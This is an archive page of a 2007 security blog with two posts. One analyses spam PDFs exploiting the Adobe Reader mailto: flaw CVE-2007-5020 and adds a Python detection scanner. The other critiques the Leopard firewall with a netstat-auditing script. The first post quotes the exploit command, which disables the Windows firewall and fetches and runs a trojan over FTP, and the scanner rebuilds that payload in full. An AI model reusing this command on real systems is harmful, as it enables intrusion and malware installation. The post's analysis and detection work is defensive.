Archive for October, 2007

Oct 31

Massive exploitation of the PDF flaw by spam

If you remember, a few weeks ago I wrote a post about a hole in Adobe Acrobat/Reader (CVE-2007-5020, the mailto: URI handling bug). It appears that the proof of concept is now being used in a massive attack delivered through spam: you receive a mail with a PDF attached that contains the code exploiting the vulnerability. Since the vulnerability is not very old, I wonder how serious it will become. Remember that Slammer exploited a vulnerability that had been patched about six months earlier, and Code Red one patched about a month earlier. Thus many unpatched copies of Acrobat Reader are probably still out there.

The current form of the attack is used to install a backdoor. More specifically, it does this (SANS analysis; the sample is defanged with extra spaces):

obj<</URI(mailto :%/../../../../ ../../Windows /system32/cmd".exe"" /c /q "@echo off&netsh firewall set opmode mode=disable&echo o 81. 95. 146. 130>1&echo binary>>1&echo get /ldr.exe>>1&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&" "&"

In a more understandable form (F-Secure analysis, of a sample pointing at a different FTP server than the one above), the exploit first disables the Windows Firewall by issuing the following command:

  • netsh firewall set opmode mode=DISABLE

Then it downloads a file from the following FTP site and executes it:

  • ftp://203.121.69.116/[REMOVED].exe

This file is detected as Trojan-Downloader.Win32.Small.gkc. Currently, only around 32% of the common antivirus engines detect it. Sooner or later a new version that directly executes shellcode or worm code will be in the wild, and it will become very nasty because it will no longer be possible to block the backdoor download point with a firewall. In the meantime, better safe than sorry: the IP 203.121.69.116 should be blacklisted in your firewall, even if this box is not reachable anymore. Also remember that even if the backdoor is not installed, this exploit still deactivates the XP firewall and may therefore introduce subsequent problems.
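As a way of catching this family of PDFs at the mail gateway, here is an added example (my own code, not the SANS or F-Secure tooling) that extracts every /URI string from a PDF, decodes both literal and hex-encoded strings (a trivial way to dodge a plain grep for "cmd.exe"), and flags a mailto: URI that carries the path-traversal cmd.exe invocation, pulling out the FTP server and the file it fetches. The sample PDF, the payload text and the 192.0.2.10 address are constructed for the example and are not taken from the real samples.

```python
"""Scan a PDF for the mailto:/cmd.exe /URI payload described above.

Added example, not the analysts' tooling. The PDF and the address 192.0.2.10
(a documentation range) are constructed; the payload text mirrors the shape of
the SANS string but is not a real sample."""
import binascii
import re

# Constructed payload modelled on the quoted SANS string (straight quotes, no
# defanging spaces). 192.0.2.10 is a placeholder, not a real download server.
PAYLOAD = (b'mailto:%/../../../../../../Windows/system32/cmd".exe"" /c /q '
           b'"@echo off&netsh firewall set opmode mode=disable'
           b'&echo o 192.0.2.10>1&echo binary>>1&echo get /ldr.exe>>1'
           b'&echo quit>>1&ftp -s:1 -v -A>nul&del /q 1& start ldr.exe&" "&"')

# Constructed minimal PDF: the payload as a literal string, one benign link, and
# the same payload hex-encoded (which a naive grep for "cmd.exe" would miss).
SAMPLE_PDF = (b"%PDF-1.4\n"
              b"1 0 obj<</Type/Catalog/Pages 2 0 R/OpenAction 4 0 R>>endobj\n"
              b"2 0 obj<</Type/Pages/Kids[3 0 R]/Count 1>>endobj\n"
              b"3 0 obj<</Type/Page/Parent 2 0 R/MediaBox[0 0 200 200]>>endobj\n"
              b"4 0 obj<</S/URI/URI(" + PAYLOAD + b")>>endobj\n"
              b"5 0 obj<</S/URI/URI(http://example.com/)>>endobj\n"
              b"6 0 obj<</S/URI/URI<" + binascii.hexlify(PAYLOAD) + b">>>endobj\n"
              b"trailer<</Root 1 0 R>>\n%%EOF\n")

_ESC = {b"n": b"\n", b"r": b"\r", b"t": b"\t", b"b": b"\b", b"f": b"\f"}
_URI_KEY = re.compile(rb"/URI\s*(?=[(<])")
_IP_RE = re.compile(rb"\becho\s+o\s+(\d{1,3}(?:\.\d{1,3}){3})")   # ftp "open" line
_GET_RE = re.compile(rb"\becho\s+get\s+([^\s>&]+)")                # ftp "get" line


def _read_literal(data, i):
    """Decode the PDF literal string starting at data[i] == b'(' (nested parens
    and backslash escapes handled); return (bytes, index just past ')')."""
    depth, out, i = 1, bytearray(), i + 1
    while i < len(data) and depth:
        c = data[i:i + 1]
        if c == b"\\":
            nxt = data[i + 1:i + 2]
            if nxt in _ESC:
                out += _ESC[nxt]
                i += 2
            elif nxt and nxt in b"01234567":          # \ddd octal escape
                m = re.match(rb"[0-7]{1,3}", data[i + 1:i + 4])
                out.append(int(m.group(), 8) & 0xFF)
                i += 1 + len(m.group())
            else:                                     # \( \) \\ : keep the byte
                out += nxt
                i += 2
            continue
        if c == b"(":
            depth += 1
        elif c == b")":
            depth -= 1
            if depth == 0:
                return bytes(out), i + 1
        out += c
        i += 1
    return bytes(out), i


def _read_hex(data, i):
    """Decode the PDF hex string starting at data[i] == b'<'."""
    end = data.index(b">", i)
    digits = re.sub(rb"\s", b"", data[i + 1:end])
    if len(digits) % 2:
        digits += b"0"                                # PDF pads an odd digit with 0
    return bytes.fromhex(digits.decode("ascii")), end + 1


def extract_uris(data):
    """Every string value of a /URI key, whether literal or hex-encoded."""
    uris = []
    for m in _URI_KEY.finditer(data):
        i = m.end()
        if data[i:i + 1] == b"(":
            uris.append(_read_literal(data, i)[0])
        elif data[i:i + 2] != b"<<":                  # '<<' starts a dictionary
            uris.append(_read_hex(data, i)[0])
    return uris


def analyze_uri(uri):
    """Describe what a URI would do if handed to the vulnerable mailto: handler."""
    low = uri.lower()
    return {
        "scheme": uri.split(b":", 1)[0].lower().decode("latin-1") if b":" in uri else "",
        "traversal": b"../" in low or b"..\\" in low,
        "cmd_exe": b"cmd" in low and b".exe" in low,
        "firewall_disabled": b"netsh" in low and b"opmode" in low and b"disable" in low,
        "ftp_servers": [ip.decode("ascii") for ip in _IP_RE.findall(uri)],
        "payloads": [p.decode("latin-1") for p in _GET_RE.findall(uri)],
    }


def is_malicious(report):
    """mailto: plus directory traversal plus cmd.exe is the CVE-2007-5020 shape."""
    return report["scheme"] == "mailto" and report["traversal"] and report["cmd_exe"]


def scan_pdf(data):
    """Reports for every /URI in the file that matches the exploit pattern."""
    return [r for r in map(analyze_uri, extract_uris(data)) if is_malicious(r)]


if __name__ == "__main__":
    for report in scan_pdf(SAMPLE_PDF):
        print(report)
```

Run against the constructed file it reports two hits (the literal and the hex-encoded copy) and stays quiet on the ordinary http:// link; the `ftp_servers` field is the address to feed your blocklist. This is a signature for one payload shape, not a parser for compressed object streams or JavaScript-built URIs, so treat it as a first filter rather than a replacement for patching Reader.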

Oct 30

Mac OS X Leopard (10.5) security: firewall analysis

Leopard is supposed to have introduced 11 new security features; among them, the firewall was supposed to have been reworked.

However, as pointed out in the Leopard firewall analysis by heise Security, it appears that there are still some problems with the firewall. For me the three key points that Apple should fix are:

  1. The firewall needs to be enabled by default. Better safe than sorry is the key to security, and since most people do not run any network service it should not be a big deal anyway.
  2. When you ask for “Block all incoming connections” it should apply to every protocol, not only TCP. For instance, this policy does not apply to NTP queries (UDP) or even NetBIOS announcements (UDP)… That is totally lame. Note that you can activate UDP filtering in the advanced settings.
  3. The last requirement is more arguable but still deserves attention: why are network services running by default at all?

The combination of these problems can lead to a serious flaw. For example, the NTP (Network Time Protocol) daemon shipped with Leopard is not the latest (4.2.2 instead of 4.2.4). Imagine there is a flaw in it. With the firewall on, you should be safe enough to have time to patch. But wait a minute: no, you aren't, because the firewall is not activated! And you still aren't even if you activate it and ask to “Block all incoming connections”, because NTP is a UDP protocol… Of course, if you go to the firewall's advanced settings you can block UDP traffic, but what about the legendary OS X simplicity?
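To see the point concretely, here is an added example (mine, not heise's test script or anything shipped by Apple) that parses `netstat -an -f inet` output in the BSD/macOS layout and separates the sockets that “Block all incoming connections” covers (TCP listeners) from the UDP sockets it leaves answering the network, then emits ipfw rules to drop those ports. The netstat text below is constructed to look like a default Leopard install with NTP, NetBIOS and Bonjour up; it is not a capture from a real machine, and the port-to-service names are the standard IANA assignments.

```python
"""Which sockets does Leopard's "Block all incoming connections" really cover?

Added example, not Apple's or heise's code. SAMPLE_NETSTAT is constructed in the
shape of `netstat -an -f inet` on macOS; the hosts and ports are made up."""
import re

SAMPLE_NETSTAT = """\
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  127.0.0.1.631          *.*                    LISTEN
tcp4       0      0  *.548                  *.*                    LISTEN
udp4       0      0  *.123                  *.*
udp4       0      0  127.0.0.1.123          *.*
udp4       0      0  *.137                  *.*
udp4       0      0  *.138                  *.*
udp4       0      0  *.5353                 *.*
udp4       0      0  192.0.2.5.49152        198.51.100.1.123
"""

# Standard IANA names for the ports a default Leopard box tends to expose.
KNOWN = {123: "ntp", 137: "netbios-ns", 138: "netbios-dgm",
         548: "afp", 631: "ipp", 5353: "mdns"}

_LINE = re.compile(r"^(tcp|udp)[46]?\s+\d+\s+\d+\s+(\S+)\s+(\S+)(?:\s+(\S+))?\s*$")


def split_addr(s):
    """'*.123' -> ('*', 123); '127.0.0.1.631' -> ('127.0.0.1', 631)."""
    host, port = s.rsplit(".", 1)
    return host, int(port)


def parse_sockets(text):
    """One dict per socket line; header and blank lines are skipped."""
    socks = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        proto, local, foreign, state = m.groups()
        host, port = split_addr(local)
        socks.append({"proto": proto, "host": host, "port": port,
                      "foreign": foreign, "state": state or ""})
    return socks


def _reachable(s):
    """Bound to a non-loopback address and not tied to a single peer."""
    return s["foreign"] == "*.*" and not s["host"].startswith("127.")


def blocked_tcp(text):
    """TCP listeners: these are what "Block all incoming connections" stops."""
    return sorted({(s["port"], KNOWN.get(s["port"], "?"))
                   for s in parse_sockets(text)
                   if s["proto"] == "tcp" and s["state"] == "LISTEN" and _reachable(s)})


def exposed_udp(text):
    """UDP sockets that keep answering the network under that same setting."""
    return sorted({(s["port"], KNOWN.get(s["port"], "?"))
                   for s in parse_sockets(text)
                   if s["proto"] == "udp" and _reachable(s)})


def ipfw_rules(ports, base=1000):
    """ipfw(8) rules dropping inbound packets to those UDP ports; ipfw is still
    present on Leopard beside the new application firewall (load with sudo)."""
    return [f"add {base + 10 * n} deny udp from any to any dst-port {port} in"
            for n, (port, _) in enumerate(ports)]


if __name__ == "__main__":
    print("covered by 'Block all incoming':", blocked_tcp(SAMPLE_NETSTAT))
    print("still reachable over UDP:      ", exposed_udp(SAMPLE_NETSTAT))
    print("\n".join(ipfw_rules(exposed_udp(SAMPLE_NETSTAT))))
```

On the constructed output only AFP (TCP 548) falls under the TCP-only setting, while ntpd, the NetBIOS name and datagram services and mDNS stay reachable over UDP; the socket bound to 127.0.0.1 and the one already connected to a remote peer are correctly left out. Replace SAMPLE_NETSTAT with the real `netstat -an -f inet` output to audit a box.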